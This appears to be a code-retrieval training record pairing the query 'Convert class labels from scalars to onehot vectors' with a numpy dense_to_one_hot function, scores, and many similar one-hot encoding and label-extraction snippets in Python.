[ "0.6674317", "0.6536259", "0.651069", "0.63781893", "0.63752973", "0.63359886", "0.6284267", "0.6278434", "0.6248823", "0.623316", "0.6226097", "0.62114894", "0.6170373", "0.61536634", "0.61412567", "0.61320215", "0.61277705", "0.6126708", "0.6115631", "0.61038214", "0.6049643", "0.60330814", "0.599756", "0.5989057", "0.5974143", "0.5942659", "0.59076196", "0.59008455", "0.5896317", "0.58922434", "0.5878215", "0.5864552", "0.5856562", "0.58460164", "0.5845357", "0.5838753", "0.5822466", "0.5817194", "0.5814712", "0.5813837", "0.58055013", "0.580111", "0.5797613", "0.5795053", "0.57834375", "0.5781453", "0.57790285", "0.5766349", "0.5728666", "0.57284063", "0.5715311", "0.57034564", "0.56928515", "0.56864595", "0.5686363", "0.56853616", "0.5680433", "0.5672675", "0.566893", "0.5663966", "0.5663792", "0.56518245", "0.56458104", "0.564147", "0.563902", "0.56374514", "0.5636205", "0.5633028", "0.5624621", "0.5614163", "0.56095195", "0.5608902", "0.56086224", "0.56074256", "0.56028545", "0.5598171", "0.5589898", "0.55864567", "0.5574737", "0.5573722", "0.5572122", "0.55579066", "0.5554838", "0.5554422", "0.5551967", "0.55476433", "0.5546817", "0.55458564", "0.5541965", "0.55369365", "0.5535213", "0.55330414", "0.55327713", "0.5512152", "0.5511163", "0.5487973", "0.5486011", "0.5484666", "0.54822254", "0.5480896" ]
0.6521254
2
Convert class labels from scalars to onehot vectors.
def dense_to_one_hot(labels_dense, num_classes=10): num_labels = labels_dense.shape[0] index_offset = numpy.arange(num_labels) * num_classes labels_one_hot = numpy.zeros((num_labels, num_classes)) labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1 return labels_one_hot
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def one_hot(labels, classes=None):\n return K.utils.to_categorical(labels, classes)", "def one_hot(labels, classes=None):\n\n one_hot_ = K.utils.to_categorical(labels, classes)\n return(one_hot_)", "def to_onehot(labels: torch.Tensor, num_classes: int) -> torch.Tensor:\n if len(labels.size()) == 1:\n return F.one_hot(labels, num_classes).float()\n return labels", "def to_one_hot(labels, num_classes):\n shape = labels.size()\n shape = shape + (num_classes,)\n one_hot = torch.FloatTensor(shape)\n one_hot.zero_()\n dim = 1 if len(shape) == 2 else 2\n one_hot.scatter_(dim, labels.unsqueeze(-1), 1)\n return one_hot", "def To1hot(label,num_class):\n onehot = np.zeros(num_class)\n onehot[label] = 1\n return onehot", "def one_hot(labels):\n one_hot_labels = np.zeros(labels.shape + (n_actions,))\n for c in range(n_actions):\n one_hot_labels[labels == c, c] = 1.0\n return one_hot_labels", "def _labels_to_one_hot_class(self, labels, mask):\n classes = tf.one_hot(\n tf.cast(labels, tf.int32), self._num_classes, dtype=tf.float32)\n return tf.where(tf.expand_dims(mask, axis=-1), classes, 0.0)", "def _convert_to_onehot_labels(seg_label, num_classes):\n\n batch_size = seg_label.size(0)\n onehot_labels = seg_label.new_zeros((batch_size, num_classes))\n for i in range(batch_size):\n hist = seg_label[i].float().histc(\n bins=num_classes, min=0, max=num_classes - 1)\n onehot_labels[i] = hist > 0\n return onehot_labels", "def one_hot_encode(labels, num_classes=None):\n if num_classes is None:\n num_classes = len(np.unique(labels))\n return np.eye(num_classes)[labels]", "def one_hot_encode(labels, num_classes=None):\n if num_classes is None:\n num_classes = len(np.unique(labels))\n return np.eye(num_classes)[labels]", "def one_hot_encoding(labels, num_classes=10):\n num_labels = labels.shape[0]\n encoded = np.zeros((num_labels, num_classes))\n encoded[np.arange(num_labels), labels[np.arange(num_labels)]] = 1\n \n return encoded", "def dense_to_one_hot(labels, n_classes=2):\n labels = np.array(labels)\n n_labels = labels.shape[0]\n index_offset = np.arange(n_labels) * n_classes\n labels_one_hot = np.zeros((n_labels, n_classes), dtype=np.float32)\n labels_one_hot.flat[index_offset + labels.ravel()] = 1\n return labels_one_hot", "def _onehot_labels(self,\n labels,\n n_classes,\n axis=-1):\n onehot_labels = tf.one_hot(\n tf.squeeze(labels),\n depth=n_classes,\n axis=axis)\n return onehot_labels", "def dense_to_one_hot(labels_dense, num_classes):\r\n num_labels = labels_dense.shape[0]\r\n index_offset = numpy.arange(num_labels) * num_classes\r\n labels_one_hot = numpy.zeros((num_labels, num_classes))\r\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\r\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n index_offset = numpy.arange(num_labels) * num_classes\n labels_one_hot = numpy.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n index_offset = numpy.arange(num_labels) * num_classes\n labels_one_hot = numpy.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n index_offset = numpy.arange(num_labels) * num_classes\n labels_one_hot = numpy.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes):\r\n print ('in onehot', labels_dense, num_classes)\r\n num_labels = labels_dense.shape[0]\r\n index_offset = numpy.arange(num_labels) * num_classes\r\n labels_one_hot = numpy.zeros((num_labels, num_classes))\r\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\r\n return labels_one_hot", "def one_hot_embedding(labels, num_classes):\n y = torch.eye(num_classes) \n return y[labels]", "def class2onehot(class_labels, seq_len, batchsize, num_task):\n\n\n one_hot = torch.FloatTensor(batchsize,seq_len,num_task)\n one_hot.zero_()\n one_hot = one_hot.scatter_(1, seq_len,class_labels, 1)\n\n return one_hot", "def dense_to_one_hot(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def label_to_one_hot(label, num_of_class=2):\r\n import numpy as np\r\n one_hot = np.zeros((len(label), num_of_class), dtype=np.uint8)\r\n for i in range(len(label)):\r\n one_hot[i, int(label[i] - 1)] = 1 # label is 1 and 2\r\n\r\n return one_hot", "def dense_to_one_hot(labels_dense, num_classes=10):\n num_labels = labels_dense.shape[0]\n #print('check num_labels',num_labels)\n index_offset = numpy.arange(num_labels) * num_classes\n labels_one_hot = numpy.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def one_hot_embedding(labels, num_classes):\n y = torch.eye(num_classes)\n return y[labels]", "def dense_to_one_hot(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n index_offset = numpy.arange(num_labels) * num_classes\n labels_one_hot = numpy.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def one_hot_embedding(labels, num_classes):\n y = torch.eye(num_classes) # [D,D]\n return y[labels] # [N,D]", "def one_hot(labels, dim):\n batch_size = labels.size(0)\n out = torch.zeros(batch_size, dim)\n out[np.arange(batch_size), labels.squeeze().long()] = 1\n return out", "def dense_to_one_hot(labels_dense, num_classes):\n\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels)*num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def to_one_hot(class_indices, num_classes):\n one_hot_vectors = np.zeros((len(class_indices), num_classes))\n for vector_arg, class_args in enumerate(class_indices):\n one_hot_vectors[vector_arg, class_args] = 1.0\n return one_hot_vectors", "def label2onehot(self, labels, dim):\n batch_size = labels.size(0)\n out = torch.zeros(batch_size, dim)\n out[np.arange(batch_size), labels.long()] = 1\n return out", "def dense_to_one_hot(labels_dense, num_classes):\n\tnum_labels = labels_dense.shape[0]\n\tindex_offset = numpy.arange(num_labels) * num_classes\n\tlabels_one_hot = numpy.zeros((num_labels, num_classes))\n\tlabels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n\treturn labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes=10):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes=10):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def label2onehot(self, batch_size, labels):\r\n dim = 6\r\n out = torch.zeros(batch_size, dim)\r\n out[np.arange(batch_size), labels] = 1\r\n return out", "def label_to_onehot(labels):\n label_dict = {'THEORETICAL': 0, 'ENGINEERING': 1, 'EMPIRICAL': 2, 'OTHERS': 3}\n onehot = [0, 0, 0, 0]\n for l in labels.split():\n onehot[label_dict[l]] = 1\n return onehot", "def to_onehot(x, num_classes):\n return np.eye(num_classes, dtype='float32')[x]", "def conv_y_to_onehot_mat(labels):\n one_idx = np.array(labels)\n nkind = len(np.unique(one_idx))\n nlabels = len(one_idx)\n\n ret = np.zeros((nkind, nlabels))\n ret[one_idx, np.arange(nlabels)] = 1\n return ret", "def dense_to_one_hot(labels_dense, num_classes=10):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes=10):\n\tnum_labels = labels_dense.shape[0]\n\tindex_offset = numpy.arange(num_labels) * num_classes\n\tlabels_one_hot = numpy.zeros((num_labels, num_classes))\n\tlabels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n\treturn labels_one_hot", "def dense_to_one_hot(self, labels_dense, num_classes):\n return np.eye(num_classes)[labels_dense]", "def labels_to_one_hot(\n labels: np.ndarray, categories: int, axis: int = 0,\n keepdims=False, dtype=bool\n):\n if keepdims:\n assert labels.shape[axis] == 1\n result_ndim = labels.ndim\n else:\n result_ndim = labels.ndim + 1\n\n if axis < 0:\n axis += result_ndim\n\n shape = labels.shape\n zeros = np.zeros((categories, labels.size), dtype=dtype)\n zeros[labels.ravel(), range(labels.size)] = 1\n\n zeros = zeros.reshape((categories,) + shape)\n\n if keepdims:\n zeros = zeros[(slice(None),) * (axis + 1) + (0,)]\n\n zeros = np.moveaxis(zeros, 0, axis)\n\n return zeros", "def one_hot_embedding(labels, num_classes, device=\"cuda:0\"):\n y = torch.eye(num_classes).to(device)\n return y[labels]", "def one_hot(x, num_classes, dtype=jnp.float32):\n return jax.nn.one_hot(x, num_classes).astype(dtype)", "def _dense_to_one_hot(self, labels_dense, num_classes=10):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def DenseToOneHot(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes):\n\n assert labels_dense.ndim == 1 or labels_dense.ndim == 2\n assert labels_dense.dtype == np.int32\n\n if labels_dense.ndim == 1:\n num_sequences = 0\n sequence_len = labels_dense.shape\n else:\n num_sequences, sequence_len = labels_dense.shape\n\n labels_dense = labels_dense.reshape(-1)\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes), dtype=np.float32)\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n\n if num_sequences > 0:\n labels_one_hot = labels_one_hot.reshape((num_sequences, sequence_len, num_classes))\n\n return labels_one_hot", "def convert_to_onehot(vector, num_classes=None):\n assert isinstance(vector, np.ndarray)\n assert len(vector) > 0\n\n if num_classes is None:\n num_classes = np.max(vector)+1\n else:\n assert num_classes > 0\n assert num_classes >= np.max(vector)\n\n result = np.zeros(shape=(len(vector), num_classes))\n result[np.arange(len(vector)), vector] = 1\n return result.astype(int)", "def dense_to_one_hot(labels_dense, label):\n num_labels = len(labels_dense)\n index_offset = list(labels_dense).index(label)\n labels_one_hot = np.zeros(num_labels)\n labels_one_hot[index_offset] = 1\n return labels_one_hot", "def _onehot(integer_labels):\r\n n_rows = len(integer_labels)\r\n n_cols = integer_labels.max() + 1\r\n onehot = np.zeros((n_rows, n_cols), dtype='uint8')\r\n onehot[np.arange(n_rows), integer_labels] = 1\r\n return onehot", "def encode_labels(self, y, num_labels):\n onehot = np.zeros((num_labels, y.shape[0]))\n for i in range(y.shape[0]):\n onehot[y[i], i] = 1.0\n return onehot", "def _one_hot_encode(label_vector, total_num_labels):\n out = np.zeros(shape=(len(label_vector), total_num_labels))\n for i in range(len(label_vector)):\n out[i, int(label_vector[i])] = 1\n return out", "def dense_to_one_hot(labels_dense, num_classes=2):\n # copied from TensorFlow tutorial\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[(index_offset + labels_dense.ravel()).astype(int)] = 1\n return labels_one_hot.astype(np.float32)", "def one_hot_encode(Y, classes):\n if type(classes) is not int:\n return None\n if Y is None or type(Y) != np.ndarray:\n return None\n for c in Y:\n if c >= classes or c < 0:\n return None\n m = Y.shape[0]\n mtx = np.zeros((m, classes))\n\n for row, c_label in zip(mtx, Y):\n row[c_label] = 1\n\n return mtx.T", "def label_to_one_hot(x, labels=None):\n n = len(labels)\n labels_idx = {l: i for i, l in enumerate(labels)}\n if not hasattr(x, '__len__'):\n output = np.zeros((n,))\n output[labels_idx[x]] = 1\n else:\n x = np.array(x, dtype=np.int)\n orig_shp = x.shape\n x = np.reshape(x, (-1))\n x = np.array([labels_idx[_] for _ in x])\n output = np.zeros((x.shape[0], n))\n output[np.arange(x.shape[0]), x] = 1\n if len(orig_shp) == 1:\n output_shape = orig_shp + (n,)\n else:\n output_shape = orig_shp[:-1] + (n,)\n output = output.reshape(output_shape)\n\n return output", "def _get_one_hot(targets, num_classes):\n ret = np.zeros((num_classes, targets.shape[0]))\n ret[targets, np.arange(targets.size)] = 1\n return ret", "def dense_to_one_hot(labels_dense, num_classes=2):\n # copied from TensorFlow tutorial\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def one_hot_encode(label, label_values):\n semantic_map = []\n for colour in label_values:\n equality = np.equal(label, colour)\n class_map = np.all(equality, axis = -1)\n semantic_map.append(class_map)\n semantic_map = np.stack(semantic_map, axis=-1)\n\n return semantic_map", "def one_hot(y, num_classes):\n return np.eye(num_classes)[y]", "def onehot_encoding(labels, dim, device):\n out = th.zeros(list(labels.size()) + [dim]).to(device)\n out.scatter_(len(out.size()) - 1, labels.unsqueeze(-1), 1.0)\n return out", "def get_one_hot_encoded(self, label):\n try:\n label = str(label, 'utf-8').lower()\n except:\n label = str(label).lower() # hack for pytest TODO\n vector = np.zeros(self._labels_dim, dtype=int)\n index = self.get_label_2_index(label=label)\n vector[index] = 1\n return vector", "def make_onehot(x,num_labels=7):\n enc = OneHotEncoder(n_values=num_labels)\n return enc.fit_transform(np.array(x).reshape(-1, 1)).toarray()", "def one_hot_encode(self, arr, n_labels):\n one_hot = np.zeros((np.multiply(*arr.shape), n_labels), dtype=np.float32)\n one_hot[np.arange(one_hot.shape[0]), arr.flatten()] = 1.\n one_hot = one_hot.reshape((*arr.shape, n_labels))\n \n return one_hot", "def label_name_to_one_hot(self, label_name):\n label_name_to_int = {n: i for i, n in enumerate(BOX_LABELS)}\n label_id = label_name_to_int[label_name]\n one_hot = np.zeros(shape=[len(BOX_LABELS)], dtype=np.float32)\n one_hot[label_id] = 1\n return one_hot", "def one_hot_encode(x, n_classes):\n return np.eye(n_classes)[x]", "def preprocess_labels(y):\n\n y = tf.keras.utils.to_categorical(y, nclasses)\n\n return y", "def to_one_hot(arr, num_classes):\n arr = arr.data.astype(int)\n a = np.zeros((arr.shape[0], num_classes))\n a[np.arange(len(a)), arr] = 1\n return tensor.Tensor(a, requires_grad=True)", "def to_one_hot(arr, num_classes):\n arr = arr.data.astype(int)\n a = np.zeros((arr.shape[0], num_classes))\n a[np.arange(len(a)), arr] = 1\n return tensor.Tensor(a, requires_grad=True)", "def convert_to_one_hot(pos_lbl, neg_lbl, num_classes: int) -> torch.Tensor:\n one_hot_targets = torch.LongTensor(num_classes).zero_() - 1\n if isinstance(pos_lbl, list) and (len(pos_lbl) > 0):\n assert (\n max(pos_lbl) < num_classes\n ), \"Class Index must be less than number of classes\"\n one_hot_targets.scatter_(0, torch.Tensor(pos_lbl).long(), 1)\n if isinstance(neg_lbl, list) and (len(neg_lbl) > 0):\n assert (\n max(neg_lbl) < num_classes\n ), \"Class Index must be less than number of classes\"\n one_hot_targets.scatter_(0, torch.Tensor(neg_lbl).long(), 0)\n return one_hot_targets.squeeze()", "def indices_to_one_hot(data, nb_classes):\n targets = np.array(data).reshape(-1)\n return np.eye(nb_classes)[targets]", "def indices_to_one_hot(data, nb_classes):\n targets = np.array(data).reshape(-1)\n return np.eye(nb_classes)[targets]", "def indices_to_one_hot(data, nb_classes):\n targets = np.array(data).reshape(-1)\n return np.eye(nb_classes)[targets]", "def indices_to_one_hot(data, nb_classes):\n targets = np.array(data).reshape(-1)\n return np.eye(nb_classes)[targets]", "def indices_to_one_hot(data, nb_classes):\n\ttargets = np.array(data).reshape(-1)\n\treturn np.eye(nb_classes)[targets]", "def get_onehot(tensor, labels=10):\n one_hot = np.zeros((tensor.shape[0], labels))\n one_hot[range(tensor.shape[0]), tensor.astype(int)] = 1.\n return one_hot", "def onehot_encode_labels(y):\n\treturn OneHotEncoder(categories=\"auto\", sparse=False).fit_transform(y.reshape(y.shape[0],1))", "def one_hot(class_ids, num_classes):\n oh = np.zeros((len(class_ids), num_classes), dtype=np.float32)\n oh[np.arange(len(class_ids)), class_ids] = 1\n\n assert (oh.argmax(axis=1) == class_ids).all()\n assert (oh.sum(axis=1) == 1).all()\n\n return oh", "def indices_to_one_hot(cls_indeces, nb_classes):\n targets = np.array(cls_indeces).reshape(-1)\n return np.eye(nb_classes)[targets]", "def get_one_hot_vector(number):\n from sklearn.preprocessing import LabelBinarizer\n encoder = LabelBinarizer()\n seed_vector = np.arange(10)\n encoder.fit(seed_vector)\n labels = encoder.transform(seed_vector)\n return labels.astype(np.float32)", "def dense_to_one_hot(label_dense,num_classes=2): # scalars 标量 一个one-hot向量除了某一位的数字是1以外其余各维度数字都是0\n num_labels = label_dense.shape[0]\n index_offset = np.arange(num_labels)*num_classes # idnex_offset该下标表表示的是一维时候每个labels的对应下标 arange一个参数时,参数值为终点,起点取默认值0,步长取默认值1\n labels_one_hot = np.zeros((num_labels,num_classes))\n labels_one_hot.flat[index_offset+label_dense.ravel()] = 1 # 对one_hot矩阵的指定的位置进行赋值1的操作 index_offset+labels_dense.ravel() 得到的是一个下标 flat属性返回的是一个array的遍历对象,此时它是一维形式的 ravel()返回的是一个副本,但是这个副本是原来数据的引用,有点类似于c++的引用。主要是减少存储空间的使用。返回的也是一个一维形式的数据\n return labels_one_hot", "def one_hot_encoding(gt, num_classes):\n if gt.ndim == 1:\n # multi-class classification\n return F.one_hot(gt, num_classes=num_classes)\n else:\n # binary classification\n # example. [[0], [1], [1]]\n # multi-label classification\n # example. [[0, 1, 1], [1, 0, 0], [1, 1, 1]]\n return gt", "def indices_one_hot(labels_indices, num_classes=10):\n \n num_labels = labels_indices.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_indices.ravel()] = 1\n \n return labels_one_hot", "def indices_one_hot(labels_indices, num_classes=10):\n\n num_labels = labels_indices.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_indices.ravel()] = 1\n\n return labels_one_hot", "def unhot(one_hot_labels):\n return np.argmax(one_hot_labels, axis=1)", "def convert_multiclass_to_binary_labels(multiclass_labels):\n if isinstance(multiclass_labels, torch.Tensor):\n binary_labels = torch.zeros_like(multiclass_labels)\n elif isinstance(multiclass_labels, np.ndarray):\n binary_labels = np.zeros_like(multiclass_labels)\n\n binary_labels[multiclass_labels != 0] = 1\n\n return binary_labels", "def onehot(inputs, num_classes):\n num_sample = inputs.size(0)\n inputs_onehot = torch.zeros(num_sample, num_classes)\n inputs_onehot.scatter_(1, inputs.unsqueeze(1), 1.0)\n return inputs_onehot", "def _onehot(y, n_classes=False):\n if not n_classes:\n \"\"\"Create one-hot encoded labels.\"\"\"\n n_classes = len(set(y))\n out = np.zeros((len(y), n_classes))\n for i, ii in enumerate(y):\n out[i][ii] += 1\n y_onehot = out.astype(int)\n return y_onehot", "def one_hot(y_):\n y_ = y_.reshape(len(y_))\n n_values = int(np.max(y_)) + 1\n n_values = 6\n return np.eye(n_values)[np.array(y_, dtype=np.int32)] # Returns FLOATS", "def onehot(t, num_classes):\n assert isinstance(t, torch.LongTensor)\n return torch.zeros(t.size()[0], num_classes).scatter_(1, t.view(-1, 1), 1)", "def one_hot_encoded(class_numbers, num_classes=None):\n\n # Find the number of classes if None is provided.\n # Assumes the lowest class-number is zero.\n if num_classes is None:\n num_classes = np.max(class_numbers) + 1\n\n return np.eye(num_classes, dtype=float)[class_numbers]", "def one_hot_encoded(class_numbers, num_classes=None):\n\n # Find the number of classes if None is provided.\n # Assumes the lowest class-number is zero.\n if num_classes is None:\n num_classes = np.max(class_numbers) + 1\n\n return np.eye(num_classes, dtype=float)[class_numbers]", "def labels_to_labels(class_labels, num_classes =4):\n levels = []\n for label in class_labels:\n levels_from_label = label_to_levels(int(label), num_classes=num_classes)\n levels.append(levels_from_label)\n return torch.stack(levels).cuda()", "def convert_to_one_hot(a):\n a = a[:, 0]\n a = a.astype(int)\n A = np.zeros((len(a), config.num_classes))\n A[np.arange(len(a)), a] = 1\n return A", "def convert_to_one_hot_labels(input, target, val=0):\n \n tmp = input.new(target.size(0), target.max() + 1).fill_(-1)\n tmp.scatter_(1, target.view(-1, 1), 1.0)\n # for some activation functions, e.g. relu\n if val == 0:\n ret = (tmp + 1) / 2\n # for some activation functions, e.g. tanh\n if val == -1:\n ret = tmp\n return ret", "def to_categorical(index_label, num_classes):\n return index_label, np.eye(num_classes, dtype='uint8')[index_label]", "def dense_to_one_hot(labels_dense, num_classes, nlevels=1):\n if nlevels == 1:\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes), dtype=np.int32)\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot\n elif nlevels == 2:\n # assume that labels_dense has same column length\n num_labels = labels_dense.shape[0]\n num_length = labels_dense.shape[1]\n labels_one_hot = np.zeros((num_labels, num_length, num_classes), dtype=np.int32)\n layer_idx = np.arange(num_labels).reshape(num_labels, 1)\n # this index selects each component separately\n component_idx = np.tile(np.arange(num_length), (num_labels, 1))\n # then we use `a` to select indices according to category label\n labels_one_hot[layer_idx, component_idx, labels_dense] = 1\n return labels_one_hot\n else:\n raise ValueError('nlevels can take 1 or 2, not take {}.'.format(nlevels))", "def dense_to_one_hot(labels_dense, num_classes, nlevels=1):\n if nlevels == 1:\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes), dtype=np.int32)\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot\n elif nlevels == 2:\n # assume that labels_dense has same column length\n num_labels = labels_dense.shape[0]\n num_length = labels_dense.shape[1]\n labels_one_hot = np.zeros((num_labels, num_length, num_classes), dtype=np.int32)\n layer_idx = np.arange(num_labels).reshape(num_labels, 1)\n # this index selects each component separately\n component_idx = np.tile(np.arange(num_length), (num_labels, 1))\n # then we use `a` to select indices according to category label\n labels_one_hot[layer_idx, component_idx, labels_dense] = 1\n return labels_one_hot\n else:\n raise ValueError('nlevels can take 1 or 2, not take {}.'.format(nlevels))" ]
[ "0.8250402", "0.807683", "0.80523187", "0.7977843", "0.7908335", "0.7900327", "0.7892233", "0.7869711", "0.7849721", "0.7849721", "0.7826951", "0.7826122", "0.77677035", "0.7765413", "0.77540547", "0.77540547", "0.77540547", "0.77489346", "0.7742955", "0.7737176", "0.77226317", "0.77123284", "0.7711196", "0.769438", "0.7690543", "0.7673946", "0.7672027", "0.76648885", "0.76598144", "0.76598144", "0.76598144", "0.76598144", "0.7649487", "0.7638954", "0.76354444", "0.7622406", "0.7622406", "0.7620295", "0.7606602", "0.7604131", "0.76039714", "0.76016307", "0.7587813", "0.7555525", "0.75284547", "0.75079954", "0.74816835", "0.7478094", "0.7469378", "0.7453988", "0.7452055", "0.74479073", "0.74472725", "0.74157184", "0.73598224", "0.7352546", "0.7313677", "0.7300708", "0.72989976", "0.72958356", "0.72529936", "0.7244565", "0.723758", "0.72373277", "0.7229422", "0.7219798", "0.7210118", "0.71689993", "0.7167833", "0.71630746", "0.71630746", "0.7150164", "0.71444476", "0.71444476", "0.71444476", "0.71444476", "0.71299696", "0.7119454", "0.711388", "0.7109622", "0.71089375", "0.7103112", "0.7095776", "0.7073025", "0.7062782", "0.70482117", "0.703764", "0.7036766", "0.7032162", "0.70132685", "0.6992898", "0.6975648", "0.69754434", "0.69754434", "0.69713694", "0.69682264", "0.6957243", "0.6925733", "0.69248796", "0.69248796" ]
0.76462805
33
Extract the labels into a 1D uint8 numpy array [index].
def extract_labels(nlabels,filename, one_hot=False): print('Extracting', filename,'bbbccicicicicib') labels=numpy.loadtxt(filename,dtype='int64') if one_hot: print("LABELS ONE HOT") print(labels.shape) XXX=dense_to_one_hot(labels,nlabels) print(XXX.shape) return dense_to_one_hot(labels,nlabels) print("LABELS") print(labels.shape) return labels
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def labels_array(self):\n return _build_label_vector_rows(\n [[(label, 1)] for label in self.labels], self.training_labels)[1:].T", "def array2(self):\r\n profbox(whoami())\r\n # research\r\n inputLabelID = self.__needleLabelSelector.currentNode().GetID()\r\n labelnode = slicer.mrmlScene.GetNodeByID(inputLabelID)\r\n i = labelnode.GetImageData()\r\n shape = list(i.GetDimensions())\r\n shape.reverse()\r\n a = vtk.util.numpy_support.vtk_to_numpy(i.GetPointData().GetScalars()).reshape(shape)\r\n labels = []\r\n val = [[0, 0, 0] for i in range(a.max() + 1)]\r\n for i in xrange(2, a.max() + 1):\r\n w = numpy.transpose(numpy.where(a == i))\r\n # labels.append(w.mean(axis=0))\r\n val[i] = [0, 0, 0]\r\n val[i][0] = w[int(round(w.shape[0] / 2))][2]\r\n val[i][1] = w[int(round(w.shape[0] / 2))][1]\r\n val[i][2] = w[int(round(w.shape[0] / 2))][0]\r\n if val[i] not in self.previousValues:\r\n labels.append(val[i])\r\n self.previousValues.append(val[i])\r\n return labels", "def extract_labels(filename):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(10000)\n labels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)\n return labels", "def get_labels(self) -> np.ndarray:\n if self.i - 1 >= self.k:\n logging.error(\"No more training iterations!!\")\n return np.array([])\n _, test = self.indexes[self.i - 1]\n return self.labels.take(test, axis=-1)", "def array2(self):\n print \"array2\"\n msgbox(whoami())\n #research\n inputLabelID = self.__needleLabelSelector.currentNode().GetID()\n labelnode=slicer.mrmlScene.GetNodeByID(inputLabelID)\n i = labelnode.GetImageData()\n shape = list(i.GetDimensions())\n shape.reverse()\n a = vtk.util.numpy_support.vtk_to_numpy(i.GetPointData().GetScalars()).reshape(shape)\n labels=[]\n val=[[0,0,0] for i in range(a.max()+1)]\n for i in xrange(2,a.max()+1):\n w =numpy.transpose(numpy.where(a==i))\n # labels.append(w.mean(axis=0))\n val[i]=[0,0,0]\n val[i][0]=w[int(round(w.shape[0]/2))][2]\n val[i][1]=w[int(round(w.shape[0]/2))][1]\n val[i][2]=w[int(round(w.shape[0]/2))][0]\n 